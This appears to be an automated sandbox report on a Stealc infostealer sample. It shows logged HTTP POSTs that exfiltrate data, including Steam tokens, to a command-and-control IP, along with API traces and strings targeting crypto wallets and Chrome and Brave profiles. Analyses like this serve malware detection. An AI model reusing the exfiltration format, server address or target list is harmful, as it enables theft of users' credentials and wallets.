66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="file"------AFBAFBKEGCFBGCBFIDAK--
Sep 30, 2024 07:08:14.444073915 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:14.447156906 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="message"ybncbhylepme------CFIECBFIDGDAKFHIEHJK--
Sep 30, 2024 07:08:14.678656101 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:14 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2338 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Sep 30, 2024 07:08:14.680372000 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DGHJECAFIDAFHJKFCGHI--
Sep 30, 2024 07:08:15.399600029 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	01:07:53
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x890000
File size:	1'842'688 bytes
MD5 hash:	BEB729F85B42E8201B31A5B96C898F5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1669710829.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1896811393.000000000140E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1896811393.0000000001482000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	22.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 008A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01422500), ref: 008A98A1
GetProcAddress.KERNEL32(74DD0000,014223B0), ref: 008A98BA
GetProcAddress.KERNEL32(74DD0000,014224E8), ref: 008A98D2
GetProcAddress.KERNEL32(74DD0000,01422440), ref: 008A98EA
GetProcAddress.KERNEL32(74DD0000,01422410), ref: 008A9903
GetProcAddress.KERNEL32(74DD0000,01429278), ref: 008A991B
GetProcAddress.KERNEL32(74DD0000,01415830), ref: 008A9933
GetProcAddress.KERNEL32(74DD0000,014156F0), ref: 008A994C
GetProcAddress.KERNEL32(74DD0000,01422308), ref: 008A9964
GetProcAddress.KERNEL32(74DD0000,014224A0), ref: 008A997C
GetProcAddress.KERNEL32(74DD0000,014224D0), ref: 008A9995
GetProcAddress.KERNEL32(74DD0000,01422218), ref: 008A99AD
GetProcAddress.KERNEL32(74DD0000,01415710), ref: 008A99C5
GetProcAddress.KERNEL32(74DD0000,01422458), ref: 008A99DE
GetProcAddress.KERNEL32(74DD0000,01422278), ref: 008A99F6
GetProcAddress.KERNEL32(74DD0000,014158B0), ref: 008A9A0E
GetProcAddress.KERNEL32(74DD0000,01422470), ref: 008A9A27
GetProcAddress.KERNEL32(74DD0000,01422260), ref: 008A9A3F
GetProcAddress.KERNEL32(74DD0000,01415790), ref: 008A9A57
GetProcAddress.KERNEL32(74DD0000,01422380), ref: 008A9A70
GetProcAddress.KERNEL32(74DD0000,01415A50), ref: 008A9A88
LoadLibraryA.KERNEL32(014222C0,?,008A6A00), ref: 008A9A9A
LoadLibraryA.KERNEL32(01422350,?,008A6A00), ref: 008A9AAB
LoadLibraryA.KERNEL32(014222F0,?,008A6A00), ref: 008A9ABD
LoadLibraryA.KERNEL32(01422320,?,008A6A00), ref: 008A9ACF
LoadLibraryA.KERNEL32(01422338,?,008A6A00), ref: 008A9AE0
GetProcAddress.KERNEL32(75A70000,01422368), ref: 008A9B02
GetProcAddress.KERNEL32(75290000,01422398), ref: 008A9B23
GetProcAddress.KERNEL32(75290000,014223C8), ref: 008A9B3B
GetProcAddress.KERNEL32(75BD0000,014223E0), ref: 008A9B5D
GetProcAddress.KERNEL32(75450000,01415A70), ref: 008A9B7E
GetProcAddress.KERNEL32(76E90000,01429218), ref: 008A9B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 008A9BB6

Strings

NtQueryInformationProcess, xrefs: 008A9BAA

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 70ac35f577ebb1054fdddfbd77d023c7ea1aa1310866c0a1d9c3b01ecd67bb4c
Instruction ID: 031de317690c6e40a2edf9fa75207028aa777c60b185a3e0eb5ff23e168a68d5
Opcode Fuzzy Hash: 70ac35f577ebb1054fdddfbd77d023c7ea1aa1310866c0a1d9c3b01ecd67bb4c
Instruction Fuzzy Hash: 04A13CBA6022419FD344EFE8ED8896A37F9F76C701704851BEA07C3264D7399943DB62

Function 008945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0089460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0089479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008945E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0089473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00894657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008946D8

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 6fe1f7b31f75ae5f1c95ac7ab65d43e7b1be43f6617c7442c929a18be1e1b594
Instruction ID: f39c453b299043b6fe99db95dd9bcc098640627e88767c517a9d5582076e97b9
Opcode Fuzzy Hash: 6fe1f7b31f75ae5f1c95ac7ab65d43e7b1be43f6617c7442c929a18be1e1b594
Instruction Fuzzy Hash: C64117607C96CCEACE2DB7ACD84EFDD7EB6FF46700F445288A86192390CFA46A004715

Function 0089BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,008B0B32,008B0B2B,00000000,?,?,?,008B13F4,008B0B2A), ref: 0089BEF5
StrCmpCA.SHLWAPI(?,008B13F8), ref: 0089BF4D
StrCmpCA.SHLWAPI(?,008B13FC), ref: 0089BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0089C7BF
FindClose.KERNEL32(000000FF), ref: 0089C7D1

Strings

Google Chrome, xrefs: 0089C634
Brave, xrefs: 0089C102
\Brave\Preferences, xrefs: 0089C1DB
Preferences, xrefs: 0089C11E

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
